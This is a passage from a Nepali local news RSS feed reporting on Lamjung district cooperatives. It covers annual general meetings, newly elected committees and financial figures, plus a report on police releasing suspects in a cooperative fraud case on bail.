यो मुद्दामा अर्को अनौठो के पनि छ भने ऋणीहरूलाई लेनदेनको मुद्दा चलाउनु पर्नेमा यो पनि मोटो रकम बार्गेनिङ गर्नकै लागि ठगी मुद्दा चलाइएको भन्ने पनि सम्बद्ध जानकारहरूले बताएका छन् । यसप्रकार देशमा सुशासनको नमूना प्रदर्शन गरिएको छ ।
]]>https://www.antaranganews.com/?feed=rss2&p=374170लक्ष्मीनारायण साकोसको छैंटौं अधिवशेनबाट अध्यक्षमा कान्तादेवी सर्वसम्मत चयन
https://www.antaranganews.com/?p=37201
https://www.antaranganews.com/?p=37201#respondSun, 14 Dec 2025 02:56:23 +0000https://www.antaranganews.com/?p=37201बेसीशहर– लमजुङको सदरमुकाम यहाँ स्थित महिलाहरूद्वारा सञ्चालित लक्ष्मीनारायण बचत तथा ऋण सहकारी संस्था लिमिटेडको १३ औ बार्षिक साधारण सभा छैटौं अधिवेशन विविध कार्यक्रमका साथ सम्पन्न भएको छ । अधिवेशनले कान्तीदेवी घिमिरेको अध्यक्षतामा ७ सदस्यीय नयाँ सञ्चालक समिति मंसिर २८ गते चयन गरेको हो ।
नवनिर्वाचित कार्यसमितिको उपाध्यक्षमा मैयाकुमारी श्रेष्ठ, सचिवमा विमला पौडेल, कोषाध्यक्षमा विनिता बोहरा, सदस्यहरूमा, खातुन मिया, कला घिमिरे र सीता गौली रहनुुभएको छ ।
उक्त संस्थाको लेखा समितिको संयोजकमा अमृता घिमिरे ‘असीम’, सदस्यमा रमा न्यौपाने सर्वसम्मत रुपमा चयन हुनुभएको छ । त्यस्तै, ऋण समितिको सदस्यमा सविता बोहरालाई चयन गरिएको छ । बाँकी सदस्यहरू बैठकबाट चयन गरिने जानकारी दिइएको छ ।
लक्ष्मीनारायण नारायण सामुदायिक पुस्तकालयको सभाहलमा भएको सो कार्यक्रममा संस्थाका पूर्वअध्यक्ष एवम् गण्डकी प्रदेश सभासदस्य पार्वती तामाङ प्रमुख अतिथि हुनुहुन्थ्यो । उहाँले आफू समेत संस्थापक भएर सञ्चालनमा ल्याएको यो संस्थालाई आजको स्थानमा आएको देख्न पाउँदा खुशी व्यक्त गर्नु भयो । उहाँले यतिबेला सहकारीका वारेमा धेरै टिका टिप्पणी भए पनि लक्ष्मीनारायण सहकारी संस्था सहकारीको नीति नियम भित्र रहेर सञ्चालनमा रहेको आफूले पाइरहेको बताउनुभयो । उहाँले सस्था संचालनको क्रममा विभिन्न समस्या आइपर्न सक्छन् तर त्यसमा समयमै होसियारी अपनाएमा ती समस्यालाई क्रमिक रुपमा सुधार गर्न सकिन्छ, यसरी नै अघि बढ्न अनुरोध गर्दछु भन्नुभयो । आर्थिक पारदर्शिता र सहकारीका सिद्धान्तलाई आत्मसाथ गर्दै संस्थाप्रति सञ्चालक समिति, कर्मचारीहरू र सेयर सदस्यसमेत इमान्दार र कर्तव्यनिष्ट हुनुपर्छ उहाँले भन्नुभयो ।
साधारसभाको अध्यक्षता गर्नु भएकी साकोसका अध्यक्ष सृजना घिमिरेले संस्थाको प्रतिवेदन प्रस्तुत गर्दै आर्थिक बर्ष २०८१÷८२ को कुल वासलत ५ करोड ४७ लाख ६७ हजार ३ सय ७५ रुपैया रहेको छ भन्नुभयो । उहाँले दुई लाख शेयर पूँजीबाट सुरु भएको साकोसको शेयर पुँजी हाल ८७ लाख १४ हजार ८ सय ९४ पैसा रहेको जानकारी दिदै २०६९ सालमा जम्मा ४० जना शेयर सदस्यबाट सुरु भएको लक्ष्मीनारायण सहकारीमा हाल १५ सय ५९ शेयर सदस्य पुगेको उल्लेख गर्नुभयो ।
चार जनालाई रोजगारी दिन सकेको उक्त साकोसमा जगेडा कोष ४१ लाख सात हजार ३७० रुपैयाँ रहेको, छ करोड ८४ लाख ५० हजार ७९२ रुपैयाँ बचत संकलन गर्न सक्षम रहेको उक्त संस्थाको ऋण लगानी १२ करोड ३२ लाख ४५ हजार ९५० रुपैयाँ कारोवार गरेको जानकारी अध्यक्ष घिमिरेले दिनुभएको थियो ।
सहकारीका सात सिद्धान्तमा समेत प्रष्ट्याउँदै अध्यक्ष घिमिरेले भावि कार्यक्रमका बारेमा समेत प्रकाश पार्नु भएको थियो । पछिल्लो समयमा केही सहकारीमा देखिएको समस्यालाई लिएर समग्र सहकारीलाई नै अविश्वास गर्न वातावरण बन्दै गएको त्यस्तो गर्न नहुने उहाँको भनाइ थियो ।
साकोसका उपाध्यक्ष ज्ञानुमाया नखोलाले स्वागत मन्तव्य र संस्थाका सचिव विमला पौडेलले सहजिकरण गर्नुभएको थियो । सो अवसरमा साधारण सभामा बार्षिक आय व्यय तथा लेखा परीक्षण प्रतिवेदन संस्थाका कोषाध्यक्ष कान्तादेवी घिमिरेले प्रस्तुत गर्नुभएको थियो ।
कार्यक्रममा उषा बराल, उषादेवी घिमिरे, संस्थाका सदस्य खातुन मियाले शुभकामना मन्तव्य राख्नुभएको थियो । संस्थाको संस्थापक अध्यक्ष रहनु भएकी शोभा थापाले धन्यवाद मन्तव्यका क्रममा यो संस्थाका लागि आफूले धेरै दुःख गरेको स्मरण गर्नुभएको थियो ।
लमजुङमा खोलिएका सहकारी संस्थामा केही बदनाम कमाई बन्द भएता पनि निरन्तर सञ्चालनमा दर्जनौं सहकारी संस्थाहरू छन् । तिनमा महिलाहरूले मात्र सञ्चालन गरेका सहकारी संस्था विरलै भेटिन्छन् । तीमध्येका सहकारी संस्थामा पनि उक्त साकोस् उदाहरीय रहेको छ ।
सो संस्थामा स्थापनाकालदेखि हालसम्म क्रमशः शोभा थापा, सीता न्यौपाने अधिकारी, पार्वती तामाङ, सृजना बराल(दुई कार्यकाल) अध्यक्ष रहनु भएको छ ।
उक्त साकोसले वित्तीय क्षेत्रमा बचत संकलन र ऋण प्रवाहको कार्य मात्र नगरी महिलाहरूलाई आर्थिक एवम् समाजिक रुपले सशक्त बनाउन विभिन्न आय आर्जन एवम् सीपमूलक कार्यक्रमहरू समेत सञ्चालन गर्दै आएको छ ।
]]>https://www.antaranganews.com/?feed=rss2&p=372010सिर्जनात्मक साकोसको २९ औं बार्षिकोत्सव एवम् २६औं बार्षिक साधारण सभामा विविध कार्यक्रम
https://www.antaranganews.com/?p=37071
https://www.antaranganews.com/?p=37071#respondSun, 07 Dec 2025 07:15:11 +0000https://www.antaranganews.com/?p=37071भोटेओडार(लमजुङ)– यहाँ स्थित सिर्जनात्मक साकोसको २९ औं बार्षिकोत्सव एवम् २६ औं बार्षिक साधारण सभा विविध कार्यक्रमका साथ भव्य रुपमा सम्पन्न भएको छ । लमजुङ जिल्ला सहकारी सघको विजय गुरुङको प्रमुख आतिथ्यतामा सो बार्षिकोत्सव तथा बार्षिक साधारण सभा मंसिर २० गते सम्पन्न भएको हो ।
प्रमुख अतिथि गुरुङले सो सभाको उदघाटन गर्नु हुँदै नेपाल सरकारको तीन खम्बे अर्थनीति अनुसार सहकारी एउटा खम्बा भएको हुँदा त्यसको दायित्व पूरा गर्न हामी सहकारीहरू सदैव तयार रहेका छौं र तयार रहनु पर्छ भन्नु भयो । उहाँले केही खराब नियत भएका सञ्चालकका कारणले सहकारी अभियान नै बदनाम हुने स्थितिमा पुगेको हुँदा हामी बढी सचेत हुन जरुरी छ भन्नुभयो ।
सो अवसरमा साकोसको १० करोड ४० लाख ५२ हजार १०० रुपैयाँ शेयर पूँजी रहेको, ४४ करोड, ६४ चौसठ्ठी लाख, ४१ हजार १७४ रुपैयाँ वचत, ५१ करोड ४३ लाख ८५ हजार १७४ रुपैयाँ ऋण लगानी भएको जानकारी दिइएको थियो ।
संस्थाको जगेडा कोष ९ करोड १३ लाख ९ हजार ३३९ रुपैयाँ, १४ करोड ३६ लाख ४८ हजार १९८ रुपैयाँ तरलता रहेको साकोसले बताएको छ । २ हजार ४०५ जना महिला सदस्य, १ हजार ९०२ जना पुरुष सदस्य र ८८५ जना बाल वचत सदस्य रहेको जानकारी दिइएको थियो ।
साकोसका अध्यक्ष रामजी कँडेलको अध्यक्षतामा भएको सो कार्यक्रममा भोटेओडार क्षेत्र, सुन्दरबजार क्षेत्र, दोर्दी क्षेत्र अन्तरगत ५ वटा इकाइबाट छनौट हुनुभएका शेयर सदस्यहरूको उपस्थितिमा सो सधारणसमा भएको थियो । यसअघि ती ५ वटा इकाइमा छुट्टाछुट्टै साधारण सभा गरिएको थियो । साकोसले सेयर सदस्यहरूको हित एवम् सुविधालाई ध्यानमा राख्दै सामाजिक उत्तर दायित्वतर्फ संस्थाले पुष्पाञ्जली हस्पिटल भरतपुरसँग स्वास्थ्य उपचार गर्नका लागि सदस्यलाई विशेष छुट सहित सम्झौता गरिएको अध्यक्ष कँडेलले जानकारी दिनु भएको थियो ।
कार्यक्रममा संस्थापक एवम् पूर्वअध्यक्ष किर्तिनाथ सापकोटा, संस्थापक तथा रेडियो भोटेअोडारका अध्यक्ष हरि प्रसाद अधिकारी, भक्ति आदर्श क्याम्पसका अध्यक्ष डम्मरबहादुर कार्की लगायतले शुभकामना मन्तव्य व्यक्त गनुर्भएको थियो । उक्त कार्यक्रममा यसै क्षेत्रमा रहेको लालीगँुरास अंग्रेजी बोर्डिङ स्कुलका ससाना वाल सदस्यहरूले नाच प्रस्तुत गरेका थिए ।
उक्त अवसरमा साकोसले १७ जना बाल सदस्य सम्मान गरिएको थियो । जसमा प्रज्वल अधिकारी, एञ्जल गुरुङ, आशीका अधिकारी, सोनिया गुरुङ, सुसान गुरुङ, एलिस वाग्ले, अर्थव थापा, प्रियन्स पोख्रेल, रावन अधिकारी, अखिल गुरुङ, विधान अधिकारी, शुबु कार्की, अंशु खनाल, अर्पण खनाल र दिव्यम ढकाललाई सम्मानित भएका हुन् । असल ऋणिको तर्फबाट रमा कुँवर र असल वचतकर्ताको तर्फबाट चिजा गुरुङ छन् ।
उक्त कार्यक्रमको विशेष अतिथिमा सल्लाहकार हरिप्रसाद अधिकारी, जिल्ला संघका उपाध्यक्ष राधादेवी श्रेष्ठ, वरिष्ठ साहित्यकार एवम् सल्लाहकार गोविन्दबहादुर कुँवर, सल्लाहकारहरू कीर्तिनाथ सापकोटा, ध्रुबबहादुर कुँवर, अतिथिहरू मिरा खनाल, डम्बरबहादुर काकी, ज्योतिचन्द्र सापकोटा, भैरवकान्त अधिकारी, हुमबहादुर कार्की लगायतको सहभागिता रहेको थियो ।
संस्थाका उपाध्यक्ष चन्द्रमा घिमिरेले स्वागत गर्नुभएको सो कार्यक्रमको सञ्चालन सचिव मेनबहादुर घलेले गर्नुभएको थियो भने संस्थाको कोषाध्यक्ष महेन्द्र प्रसाद खनालले आर्थिक प्रतिवेदन बारे प्रष्ट पार्नुभएको थियो ।
]]>https://www.antaranganews.com/?feed=rss2&p=370710सिर्जनात्मक साकोसको २९ औँ वार्षिकोत्सव तथा २६ औँ वार्षिक साधारण सभाका लागि क्षेत्रगत भेलाहरू पाँच स्थानमा सम्पन्न
https://www.antaranganews.com/?p=36994
https://www.antaranganews.com/?p=36994#respondWed, 03 Dec 2025 03:31:28 +0000https://www.antaranganews.com/?p=36994भोटेओडार(लमजुङ)– यहाँ आफ्नै भवनबाट सेवा दिदै आएको सिर्जनात्मक साकोसको २९ औं बार्षिकोत्सव एवम् २६ औं बार्षिक साधारण सभाको तयारी अन्तिम चरणमा पुगेको छm । सो सन्दर्भमा साकोसको कार्यक्षेत्र रहेका पाँच स्थानमा क्षेत्रगत भेला सम्पन्न भएका छन् । मंसिर १३ गते अलैंचेबाट सुरु भएका ती भेलाका क्रमशः १६ गते आफ्नै कार्यलयका सभाहलमा अन्तिम भेला भएको हो ।
उक्त साकोसको बार्षिक साधारण सभा मंसिर २० गते आयोजना गर्ने तयारी छ । सो अवसरमा जिल्ला सहकारी संघ लमजुङका अध्यक्ष विजय गुरुङको प्रमुख आतिथ्यता रहने भएको छ ।
क्षेत्रगत भेलाहरूको सबै ठाउँमा संस्थाका अध्यक्ष रामजी कडेलको अध्यक्षता रहेको थियो भने सञ्चालन सचिव मेन घलेले गर्नु भएको थियो ।
हिजो आफ्नै भवनको सभाहलमा भएको कार्यक्रमको प्रमुख अतिति स्थानीय क्षेत्रका शिक्षा एवम् समाजसेवी, रेडियो भोटेओडारका अध्यक्ष उक्त संस्थाका संस्थापक अध्यक्ष एवम् सल्लाहकार हरिप्रसाद अधिकारी हुनुहुन्थ्यो । पूर्वअध्यक्ष कीर्तिनाथ सापकोटा, ध्रव कुँवर विशेष अतिथि रहनु भएको उक्त कार्यक्रममा भोटेओडार सामुदायिक पुस्तकालयका अध्यक्ष वसन्त खनाल, फेकोफनका जिल्ला अध्यक्ष शान्ता सापकोटा लगायतले शुभकामना व्यक्त गर्नु भएको थियो । कार्यक्रममा साकोसका सहसचिव सिर्जना अधिकारीले स्वागत मन्तव्य व्यक्त गर्नु भएको थियो ।
यसैगरी, पहिलो भेला अलैंचे स्थित केदार प्राविमा भएको हो । संस्थाका ज्येष्ठ सदस्य मानबहादुर कुँवरको प्रमुख आतिथ्यतामा भएको कार्यक्रममा अर्चलबोट, श्रीमञ्ज्याङ, भार्तेबाट २० जना क्षेत्रगत प्रतिनिधि छनोट गरिएको छ ।
उक्त कार्यक्रमको विशेष अतिथिमा दोर्दी गाउँपालिका– २ का वडा अध्यक्ष गणेशबहादुर खत्री, पूर्व वडा अध्यक्ष, लेखा समितिका सदस्य रामप्रसाद पौडेल, संस्थाका पूर्व उपाध्यक्ष गोकुल रेग्मी लगायतको आतिथ्यता रहेको थियो ।
आर्थिक प्रतिबेदन कोषाध्यक्ष महेन्द्र खनालले प्रस्तुत गुर्नभएको थियो भने कार्यक्रममा निल कमल सापकोटाले स्वागत मन्तव्य राख्नु भएको थियो ।
दोस्रो दिन, १४ गते सुन्दरबजार क्षेत्र अन्तरगत नेवाः खलः भवनमा सुन्दरबजार नगरपालिका– ६ र ७ क्षेत्रका सदस्यहरूको क्षेत्रगत भेला भएको थियो । सुन्दरबजार नगरपालिका– ६ का जेष्ठ सदस्य गम्बरबहादुर मल्लको प्रमुख आतिथ्यतामा सम्पन्न भएको थियो ।
संस्थाको उपाध्यक्ष चन्द्रमा घिमिरेले स्वागत मन्तब्य व्यक्त गर्नुभएको सो कार्यक्रममा आर्थिक प्रतिवेदन संस्थाको व्यवस्थापक इन्द्र बिलास सापकोटाले प्रस्तुत गर्नुभएको थियो ।
तेस्रो क्षेत्रीय भेला अकला मन्दीर परिसरमा सुन्दरबजार नगरपालिक– ८ र बेसीशहर नगरपालिका– १ उदिपुर क्षेत्रका सदस्यहरूको सहभागिता रहेको थियो । कार्यक्रम तथा सुन्दरबजार नगरपालिक– ८ का जेष्ठ सदस्य नारायणप्रसाद ढकालको प्रमुख आतिथ्यतामा सम्पन्न भएको हो ।
चौथो भेला सुन्दरबजार नगरपालिका– ९ को पैह्रेमा सम्पन्न भएको हो । प्रेमबहादुर भुजेलको प्रमुख आतिथ्यतामा सम्पन्न भेलामा राजेन्द्र अधिकारी, दानबहादुर परियारलगायतले शुभकामना व्यक्त गर्नु भएको थियो ।
हाल साकोसको १० करोड ४० लाख ५२ हजार १०० रुपैयाँ शेयर रकम रहेको छ भने ४४ करोड, ६४ लाख, ४१ हजार १७४ रुपैयाँ वचत छ । त्यस्तै, ५१ करोड ४३ लाख ८५ हजार १७४ रुपैयाँ ऋण लगानीमा रहेको छ । संस्थाको जगेडा कोष ९ करोड १३ लाख ९ हजार ३३९ रुपैयाँ, १४ करोड ३६ लाख ४८ हजार १९८ रुपैयाँ तरलता कोष रहेको साकोसका प्रवन्धक ईन्द्रविलास सापकोटाले बताउनु भयो । उहाँका अनुसार साकोसमा २४ सय ५ जना महिला सदस्य, १९ सय २ जना पुरुष सदस्य र ८८५ जना बाल वचत सदस्य रहेका छन् ।
साकोसले सामाजिक उत्तर दायित्वतर्फ संस्थाले पुष्पाञ्जली हस्पिटल भरतपुरसँग स्वास्थ्य उपचार गर्नका लागि सदस्यलाई विशेष छुटको सहित सम्झौता गरि महिला स्वाथ्य शिविर सञ्चालन गरी दुई सय महिलालाई लाभान्वित गराएको संस्थाका अध्यक्ष कँडेलले बताउनु भयो । उहाँका अनुसार यो वर्ष १२ जना सेयर सदस्य निधन भएकोमा सदस्यको मृत्यु राहत खर्च प्रति व्यक्ति १० हजार रुपैयाँ उपलब्ध गराएको छ । उहाँले भन्नुभयो, ‘साकोसले जेष्ठ नागरिक सम्मान, धार्मिक स्थलको भ्रमण, बाल सदस्य सम्मान, युवा लक्षित कार्यक्रम अन्तरगत भलिवल प्रतियोगितामा सहयोग, सहकारी शिक्षा कार्यक्रम, विद्यालय क्याम्पस छात्रवृद्धि, सुत्केरी खर्च एक हजार रुपैयाँ लगायतका क्षेत्रमा अतुलनीय सामाजिक उत्तरदायित्वका कार्यक्रम गरेको छ ।’
गत आवको अवधिमा कुल मुनाफा एक करोड ५८ लाख ३६ हजार ८४१ रुपैयाँ रहेको साकोसले आफ्नै कार्यालय भवनबाट सेयर सदस्यहरूलाई सेवा प्रवाह गर्दै आएको छ ।
]]>
https://www.antaranganews.com/?feed=rss2&p=369940सुन्दरबजार बहुउद्देस्यीय सहकारी संस्था लि.को १६ औ बार्षिक साधारण सभाले नयाँ कार्यसमिति सर्वसम्मत रुपमा चयन गरेको छ, खोजबहादुर गरुङ अध्यक्ष चयन
https://www.antaranganews.com/?p=36728
https://www.antaranganews.com/?p=36728#respondSun, 16 Nov 2025 13:01:37 +0000https://www.antaranganews.com/?p=36728सुन्दरबजार(लमजुङ)– यहाँ स्थित सुन्दरबजार बहुउद्देस्यीय सहकारी संस्था लि.को १६ औ बार्षिक साधारण सभा तमु समाज भवनमा सम्पन्न भएको छ । साकोसका अध्यक्ष उत्तम गुरुङको अध्यक्षतामा भएको कार्यक्रम जेष्ठ शेयर सदस्य एबम् चन्द्रसिं घलेको प्रमुख आतिथ्यमा कार्तिक २९ गते सम्पन्न भएको हो । सो सभाले नयाँ कार्यसमितिको समेत चयन गरेको छ ।
जेष्ठ शेयर सदस्य घलेले सहकारीको केन्द्रीय कार्यलयबाट हालै मात्र प्रमुख अतिथिको जिम्मेवारी जेष्ठ शेयर सदस्य दिने निर्णय भएकोले आफूलाई भाग्यमानी ठानेको बताउनु भयो । उहाँले समयमै ब्याज र किस्ता तिर्न अनुरोध गर्नु भएको थियो ।
उक्त साकोसमा ६५ करोड ९२ लाख नौ हजार तीन सय रुपैयाँ शेयर पुँजी रहेको छ । ६० करोड ९१ लाख ७१ हजार ७ सय ९३ रुपैयाँ बचत सङ्कलन रहेको कोषाध्यक्षको प्रतिवेदनमा उल्लेख गरिएको छ । त्यस्तै ४८ करोड ७५ लाख ९२ हजार ७ सय ९५ रुपैयाँ कर्जा लगानी भएको छ भने ७२ करोड ६९ लाख ८६ हजार ६ सय ४९ रुपैयाँ कारोवार गरेको छ ।
कार्यक्रममा समाजसेवी विष्णुभक्त अधिकारी, वीरसुब्बा गुरुङ, निर्मल के.सी., शिवराज खनान लगायतले शुभकामना मन्तव्य राख्नु भएको थियो । सो अवसमरा बाल बचतबाट पुरस्कार सोजित के.सी, अमिरा खातुङ्मिया, विधान गुरुङ, युएन श्रेष्ठ, सिध्या श्रेष्ठ, सोबित श्रेष्ठ, अनुभव गुरुङ, साइमन गुरुङ, जेसिका कडेललाई बाल वचतकर्ताको रुपमा सम्मान गरिएको छ । त्यस्तै, गञ्जबगादुर गुरुङ, चन्द्रबहादुर गुरुङ उत्कृष्ट वचतकर्ताको रुपमा सम्मान गरिएको साकोसले जनाएको छ ।
उपाध्यक्ष खोजबहादुर गुरुङले स्वागत मन्तव्य गर्नु भएको कार्यक्रम संस्थाका प्रबन्धक नेत्र गुरुङले सञ्चालक गर्नु भयको थियो । उहाँका अनुसार उक्त सहकारी संस्थामा सात हजार तीन सय सेयर सदस्य रहेका छन् । आर्थिक प्रतिवेदान आ.व ०८१/८२ अनुसार सो संस्थाको शेयर रकम ः छ करोड ५९ लाख २९ हजार तीन सय रुपैयाँ रहेको छ ।
संस्थाका कोषाध्यक्ष क्या. जितबहादुर गुरुङले आर्थिक प्रतिवेदन प्रस्तुत गर्दै जगेडा कोषमा दुई करोड १४ लाख ३७ हजार २८४ रुपैयाँ रहेको तथा कुल कारोबार ७२ करोड ६९ लाख ८६ हजार ६४९ रुपैयाँ रहेको जानकारी दिनुभयो ।
त्यसैगरी, वचत संकलनतर्फ छ करोड ९१ लाख ७१ हजार ७९३ रुपैयाँ रहेको छ भने कर्जा लगानीमा ४८ करोड, ७५ लाख ९२ हजार ७९५ रुपैयाँ रहेको प्रबन्धक नेत्र बहादुर गुरुङले जानकारी दिनुभएको छ ।
कार्यक्रममा कर्मदा सिर्जना मञ्चका कार्यवाहक अध्यक्ष लक्ष्मीप्रसाद मिश्रद्वारा कविता वाचन गर्नु भएको थियो । रेड्क्रस सोसाइटी सुन्दरबजार उपसाखा सभापति निर्मल के.सी, दीप ज्योति साकोसका सचिव शिवराज खनाल, नाग भैरव बहुउदेश्य सहकारीका प्रबन्धक युवराज सोती, भुजेल समाजका अध्यक्ष नथबहादुर भुजेल, दुरा सेवा समाजका अध्यक्ष नयनसिंह दुराले शुभकामना व्यक्त गर्नु भएको थियो । अन्नपूर्ण टोलसुधारका अध्यक्ष देबेन्द्र पौडेल, पत्रकार महासंघका अध्यक्ष सन्देश पौडेल, साकोसका सल्लाकारहरू लगायतको आतिथ्यता रहेको थियो ।
नयाँ कार्य समिति सर्वसम्मत चयन :
सो अवसरमा संस्थाको सञ्चालन समितिको निर्वाचन सर्वसम्मत रुपमा गरिएको थियो । जसमा अध्यक्ष ः खोजबहादुर गरुङ, उपाध्यक्ष ः सुवे रनबहादुर घले, सचिव ः क्या जितबहादुर गुरुङ, कोषाध्यक्ष सीतामाया गुरुङ, सदस्यहरूमा क्या पूर्ण बहादुर गुरुङ, तिर्थमाया गुरुङ, इन्द्र बहादुर गुरुङ, चन्द्र कुमारी गुरुङ, विर सुव्वा गुरुङ हुनुहुन्छ ।
संयोजक सुवे मिमबहादुर गुरुङ, सदस्य द्वय सुवे जगतबहादुर घले र सुकमाया गुरुङ चयन हुनुभएको प्रवन्धक नेत्र गुरुङले जानकारी दिनुभएको छ ।
नगरपालिका रासायनिक मलको सेवाबाट बञ्चित गरेकोमा सदस्यद्वारा आक्रोश व्यक्त :
उक्त अवसरमा सेयर सदस्यलाई रासायनिक मल समेत विक्रि गर्दै आएकोमा सो सहकारीलाई पछिल्ला दुई वर्षदेखि भने सुन्दरबजार नगरपालिकाको त्यो सेवाबाट बञ्चित गरेकोमा केही सेयर सदस्यहरू आक्रोश तथा सञ्चालकहरूले गुनासो गरेका थिए ।
स्मणीय छ,सुन्दरबजार बहुउद्देस्यीय सहकारी संस्था लि. जिल्लामा आफ्नै कार्यालय भवन रहेका न्यून संस्थाहरूमा पर्दछ ।
]]>https://www.antaranganews.com/?feed=rss2&p=367280सुनौलो भविष्य सहकारी ठगीमा पक्राउ परेका दुई वडाध्यक्षसहित पाँच अरोपिलाई प्रहरीद्वारा विदाको दिन धरौटीमा रिहा
https://www.antaranganews.com/?p=36118
https://www.antaranganews.com/?p=36118#respondMon, 20 Oct 2025 14:31:34 +0000https://www.antaranganews.com/?p=36118बेसीशहर– लमजुङको सुनौलो भविष्य सहकारी ठगीमा पक्राउ परेका दुई वडाध्यक्षसहित पाँच अरोपिहरू धरौटीमा रिहा भएका छन् । लमजुङको जिल्ला सदरमुकाममा केन्द्रीय कार्यालय रहेको बुहचर्चित सुनौलो भविष्य सहकारीका ठगी आरोपिहरूमध्ये प्रहरीले हिजो कार्तिक २ गते मात्र नियन्त्रणमा लिएका चार सहित पाँच जनालाई आज कार्तिक ३ गते विदाको दिनमा धरौटीमा रिहा गरेसँगै त्यस्तो खुलासा भएको हो ।
त्यसरी छुट्नेहरूमा बेसीशहर नगरपालिका– ११ का वडाध्यक्ष शिवप्रसाद जोशी, सुन्दरबजार नगरपालिका– ८ का वडाध्यक्ष विजेन्द्र थापा, भक्ति आदर्श माविका प्रावि शिक्षक थकित अधिकारी(यात्री) सहित पाँच जना रहेका छन् ।
सुनौलो भविष्य सहकारीको रकम अपचलन अर्थात ठगी धन्दा(मुद्दा)का आरोपिहरू ५० जनाका विरुद्धमा पक्राउ पूर्जी जारी भएको छ । तीमध्ये आजका मितिसम्म १४ जना मात्र प्रहरी सम्पर्कमा छन् । हिजो र आज पक्राउ परेकामध्ये पाँच जनालाई बिगो हुनेको हकमा विगो सहितको रकम धरौटी लिएर र विगो नहुनेका हकमा विगो बिनाको धरौटी रकम लिएर छाडिएको जिल्ला प्रहरी कार्यालयका प्रमुख प्रहरी नायव उपरीक्षक रेशम बोहराले बताउनु भयो । उहाँका अनुसार रिहा हुनेहरूमा दुवै जना वडाध्यक्ष जोशी र थापा समेत छन्, ती दुवैजनाले आफू जिम्माको विगो रकम यस अघिनै सहकारीमा बुझाइसकेको देखिएको हुँदा प्रतिव्यक्ति ५० हजार रुपैया मात्र धरौटी लिएर छाडिएको हो । उहाँले भन्नुभयो, ‘अदालतमा मुद्दा बुझाउँदाको दिनमा भने सबै उपस्थित हुनु पर्छ ।’
बेसीशहर नगरपालिका– ११ का वडाध्यक्ष शिवप्रसाद जोशी भने आज एकै दिनमा फुर्सद लिन सफल भएको स्रोतको भनाइ छ । जोशी सो सहकारीको संस्थापक अध्यक्ष एवम् व्यवस्थापक समेत रहेको जानकारीमा आएको छ ।
सुन्दरबजार नगरपालिका– ८ को भोटेओडारमा रहेको भक्ति नमूना माविका प्रावि शिक्षक थकित अधिकारी यात्रीले चार लाख ६१ हजार ५९५ रुपैयाँ धरौटी बुझाएर रिहा भएको जानकारीमा आएको छ । यसैगरी, यात्री बारबरको धरौटी राखेर रिहा हुनेमा विवेक अधिकारी र शंकर न्यौपाने समेत रहेको प्रहरीले जनाएको छ ।
यस्तो प्रकृतिको मुद्दाका कुनै पनि आरोपिलाई पक्राउ गरिसकेपछि बिना बयान यसरी धरौटी लिएर रिहा गर्ने अधिकार प्रहरीलाई नभएको कानुन व्यवसायीहरू बताउछन् । उनीहरूका अनुसार अदालतलगायतका सरकारी कार्यालय बन्द रहेको अवस्थामा कस्को आदेशले छाड्ने काम भएको हो ? प्रहरीलाई त्यस्तो अधिकार कानुनले कहाँ दिएको छ र ? भन्ने प्रतिप्रश्न उनीहरूले गरेका छन् । उनीहरूले भने, ‘आरोपिहरूलाई प्रहरीले आफूमार्फत जिल्ला सरकारी वकिलको कार्यालयमा बयान गराउने हो । थुनछेकको बहसमा धरौटी लिने कि पुर्पक्षका लागि थुनामा पठाउने भन्ने आदेश दिने काम अदालतको हो, प्रहरीलाई त्यो अधिकार छैन ।’ हाउगुजी सिद्धियो :
आज धरौटीमा हिरा भएका पाँच जनाको प्रकृति सार्वजनिक भएपछि उक्त सहकारी मुद्दाको पनि हाउगुजी समाप्त भएको छ । यसअघ जिल्लामा चलाइएको बेसीशहरकै कालिका सहकारीको तत्कालीन बहुचर्चित ठगी मुद्दा ‘खोदा पहाड निक्ला चुहा’को रुपमा झिसमिस भएको र आजका दिनमा पनि त्यो सहकारीका केही पीडितहरू रुदै हिडेका छन् । कालिका सहरकारीको जस्तै यो मुद्दा पनि हालत त्यस्तै त हुने होइन ? भन्दै अन्तरङ्ग न्यूजडटकमले त्यो मुद्दाको उठान भएको पहिलो दिनदेखि गर्दै आएको आशंकाले साकार रुप लिने भएको छ । आज पाँच जना रिहा भएको नजिरका आधारमा सो काण्डमा मुछिएका अन्य सबैले राहतको अनुभूति गरेको जानकारीका आएको छ । किनकि, विगो देखिएर दोषी भएकाहरूको हकमा सो रकम र अन्यका हकमा मात्र ५० हजार धरौटी राखे पुग्ने भएपछि, यो मुद्दाको हाउगुजी समाप्त भएको स्रोतको भनाइ छ ।
तर मुद्दा मिलापत्र हुन नसकेमा विगो बराबरको जरिवाना र केही दिन भने पनि कैद सजाय हुने हुन्छ । त्यसतर्फ भने प्रहरीले ध्यान दिएको देखिदैन एक कानुनव्यवसायीले भने ।
यसअघिको बहुचर्चित कालिका सहकारीको ठगी मुद्दाका आरोपिहरूले न्युनत्तम पनि दुई लाख धरौटी राख्न अदालतले आदेश गरेको थियो । सुनौलो भविष्य सहकारीको यो काण्डमा भने प्रहरीको कार्यलाई अदालतले सदर गर्ने बढी नै सम्भावना हुने जानकारहरू बताउँछन् ।
स्मरणीय छ, सुनौलो भविष्य सहकारी ठगी काण्डमा सञ्चालकहरू पक्राउ पर्ने क्रम गत साउन २५ गतेबाट सुरु भएको हो । त्यस दिनदेखि आजका दिनसम्म ७२ दिन भइसकेको छ । उक्त मुद्दामा सहकारी ठगीका अतिरिक्त संगठित अपराध र सम्पत्ती शुद्धिकरण समेत जोडिएको हुँदा प्रहरीलाई अनुसन्धानका लागि ९० दिनको अवधिको सुविधा मिल्ने कानुनी व्यवस्था छ । सो मुद्दामा संगठित अपराध र सम्पत्ती शुद्धिकरण आकर्षित नहुने भएको भए यसअघि नै (२५ दिनभित्र) मुद्दा अदालतमा बुझाइसकिएको हुनुपर्थ्यो । यसबाट पनि प्रष्ट हुन्छ कि यो सहकारीको मुद्दामा संगठित अपराध र सम्पत्ती शुद्धिकरण आकर्षित भएकोछ । सो अनुसार प्रहरीले अनुसन्धानको प्रतिवेदन सहितको मुद्दा जिल्ला सरकारी वकिल कार्यालयमा मार्फत बुझाउनका लागि अब १८ दिनको म्याद मात्र बाँकी छ । त्यो मिति आउँदो कार्तिक २१ गते पुग्ने हुन्छ । काँग्रेसका जिल्ला उपसभापति श्रीकान्तको समेत सम्पत्ती शुद्धिकरणमा तानिन सक्ने :
